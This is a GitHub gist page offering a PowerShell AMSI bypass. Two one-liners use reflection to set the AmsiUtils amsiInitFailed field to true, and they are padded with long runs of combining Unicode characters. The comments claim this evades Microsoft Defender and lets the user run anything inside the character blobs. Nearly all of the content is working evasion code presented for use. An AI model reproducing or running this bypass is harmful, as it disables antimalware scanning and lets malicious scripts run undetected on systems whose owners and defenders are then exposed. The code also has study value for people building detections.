Skip to content

Instantly share code, notes, and snippets.

@bobby-tablez
Last active March 29, 2024 17:25
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bobby-tablez/22158f0e57dae3c4f12ffae9d31701a1 to your computer and use it in GitHub Desktop.
Save bobby-tablez/22158f0e57dae3c4f12ffae9d31701a1 to your computer and use it in GitHub Desktop.
AMSI Bypass Unicode Combining
# This simply echos a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever then want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
#
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡'
'Ḇ̶̧̨̢̨̧̨̧̨̧̢̡̛̫̩̜̙̣͇̻͈̹͉̟̯̞̙͚̥̦̞̠̟͍̬̹͓̼̤̬̱̹̗̺͙̲̘̪̘̟͉̹͇̭͖̮̥͉̟̜̭̪͖̝̗̼͚̬͚̹̙̜̞̝̝̜̳̳̗͕̱̗͇̼̻̤̠̗̜̮̥͙̱̱̙͈͈̫̙̹̖̩̯̳̼̟̤̤̠̠̘̣̼͉̼͉͙̱͓̲̮̹̻̼̪̹̤͎̠͔̰͙̣̪̺͐̉̿͂͜͜͜͜͜͠ͅͅͅͅͅT̴̨̢̢̢̡̧̧̡̡̧̧̨̡̨̨̧̡̢̢̛̛̛̛͕̼͚̼̯͇̺̭̪̗̠̤̥̙̤̻͙̜͚̺͙̘̞̰̜̹̦̜͎̹͇͈̘̞͙͚̱͕̙͈̯̬͎̯̱̱͖̝̬̠͉̣͓̞͍̤̮̣͔͕̟̩͖̱͍͈̤̥̹̟̹̣̺̟̯̼̦̻̝̪̩͖̣̝̟̤̭̩̜̞̬͖̝̱̤͙̮͚̣̼͖̦͚̼̝̻͙̰͇̗̹̥̤͍̪̻̥̙̥̻̠̻͉̳̫̦̭͖̥̱̩̱̤̝̗͚͖̘͙̠̯̹̝̼̭̟̱̦̼͐́͑̍̓͋͌̈̆́́̃̒̆̾̊͗̊͗̽͌̐̏̿̐̓̔͂͊̏̔͐̀̈́̅͊̎͌͑͗̒̀̽̽̈͌̾͆̎́̍̍̓̓̈̈̅͋͒̐̃͂̈́́̐̈̈́̒̏̐̑̆͑̄͊̅̈̎͗̿̐̏̿̑̀̆̀̊̆͂́̎͑͐͒́̃̀̒̔͗̈́́͆̃͂͛͑̔̓̃̉̔̃̑̅̈́̅̾̉́̓̋̊̈́͋͐̏̉͂́͆̓̇̑̀͆̇͐̕̚͘̚̕͘͜͜͜͜͜͜͜͠͠͝͠ͅͅͅͅ';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); 'Ḇ̶̧̨̢̨̧̨̧̨̧̢̡̛̫̩̜̙̣͇̻͈̹͉̟̯̞̙͚̥̦̞̠̟͍̬̹͓̼̤̬̱̹̗̺͙̲̘̪̘̟͉̹͇̭͖̮̥͉̟̜̭̪͖̝̗̼͚̬͚̹̙̜̞̝̝̜̳̳̗͕̱̗͇̼̻̤̠̗̜̮̥͙̱̱̙͈͈̫̙̹̖̩̯̳̼̟̤̤̠̠̘̣̼͉̼͉͙̱͓̲̮̹̻̼̪̹̤͎̠͔̰͙̣̪̺͐̉̿͂͜͜͜͜͜͠ͅͅͅͅͅT̴̨̢̢̢̡̧̧̡̡̧̧̨̡̨̨̧̡̢̢̛̛̛̛͕̼͚̼̯͇̺̭̪̗̠̤̥̙̤̻͙̜͚̺͙̘̞̰̜̹̦̜͎̹͇͈̘̞͙͚̱͕̙͈̯̬͎̯̱̱͖̝̬̠͉̣͓̞͍̤̮̣͔͕̟̩͖̱͍͈̤̥̹̟̹̣̺̟̯̼̦̻̝̪̩͖̣̝̟̤̭̩̜̞̬͖̝̱̤͙̮͚̣̼͖̦͚̼̝̻͙̰͇̗̹̥̤͍̪̻̥̙̥̻̠̻͉̳̫̦̭͖̥̱̩̱̤̝̗͚͖̘͙̠̯̹̝̼̭̟̱̦̼͐́͑̍̓͋͌̈̆́́̃̒̆̾̊͗̊͗̽͌̐̏̿̐̓̔͂͊̏̔͐̀̈́̅͊̎͌͑͗̒̀̽̽̈͌̾͆̎́̍̍̓̓̈̈̅͋͒̐̃͂̈́́̐̈̈́̒̏̐̑̆͑̄͊̅̈̎͗̿̐̏̿̑̀̆̀̊̆͂́̎͑͐͒́̃̀̒̔͗̈́́͆̃͂͛͑̔̓̃̉̔̃̑̅̈́̅̾̉́̓̋̊̈́͋͐̏̉͂́͆̓̇̑̀͆̇͐̕̚͘̚̕͘͜͜͜͜͜͜͜͠͠͝͠ͅͅͅͅ'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment